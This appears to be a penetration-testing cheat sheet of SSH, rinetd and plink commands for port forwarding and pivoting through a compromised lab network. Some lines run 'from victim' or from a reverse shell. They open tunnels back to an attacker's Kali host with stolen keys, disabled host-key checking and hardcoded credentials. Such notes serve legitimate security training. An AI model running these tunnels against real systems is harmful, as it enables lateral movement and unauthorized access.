SSH
-N = no ouput
-f background
LocaL port forwarding
ssh -N -L [bind_address:]port:host:hostport [username@address]
e.g.
ssh -N -L 0.0.0.0:445:192.168.1.110:445 student@10.11.0.128
Remote port forwarding
ssh -N -R <Windows IP>:<Windows Unused Port>:<Kali IP>:<Kali port> <username>@<Windows>
e.g.
ssh -f -N -R 192.168.119.224:2221:127.0.0.1:3306 root@192.168.119.224
ssh -f -N -R 1122:10.5.5.11:22 -R 13306:10.5.5.11:3306 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i /tmp/keys/id_rsa kali@10.11.0.4
ssh -f -N -R 1080 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i /var/lib/mysql/.ssh/id_rsa kali@10.11.0.4dynamic port forwarding
From victim:
ssh -D localhost:<local_proxy_port> -f -N <user>@<machine_to_pivot>
ssh -N -D 127.0.0.1:2221 student@192.168.224.44(need to do full sT to scan hosts via this method)
priv/pub keys
On kali:
from="10.11.1.250",command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty ssh-rsa ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxO27JE5uXiHqoUUb4j9o/IPHxsPg+fflPKW4N6pK0ZXSmMfLhjaHyhUr4auF+hSnF2g1hN4N2Z4DjkfZ9f95O7Ox3m0oaUgEwHtZcwTNNLJiHs2fSs7ObLR+gZ23kaJ+TYM8ZIo/ENC68Py+NhtW1c2So95ARwCa/Hkb7kZ1xNo6f6rvCqXAyk/WZcBXxYkGqOLut3c5B+++6h3spOPlDkoPs8T5/wJNcn8i12Lex/d02iOWCLGEav2V1R9xk87xVdI6h5BPySl35+ZXOrHzazbddS7MwGFz16coo+wbHbTR6P5fF9Z1Zm9O/US2LoqHxs7OxNq61BLtr4I/MDnin www-data@ajlarinetd
Nano /etc/rinetd.conf
0.0.0.0 PORT_LISTEN HOST_FORWARDED HOST_PORT
Plink
From victim:
.\plink.exe -ssh -l [user] -pw [password] -R [bind_address:][bind_port]:host:host_port [address]
.\plink.exe -ssh -l root -pw toor -R 192.168.119.224:8008:127.0.0.1:3306 192.168.224.44On rev shell:
Cmd.exe /c echo y | .\plink.exe -ssh -l root -pw toor -R 192.168.119.224:8008:127.0.0.1:3306
192.168.224.44Last updated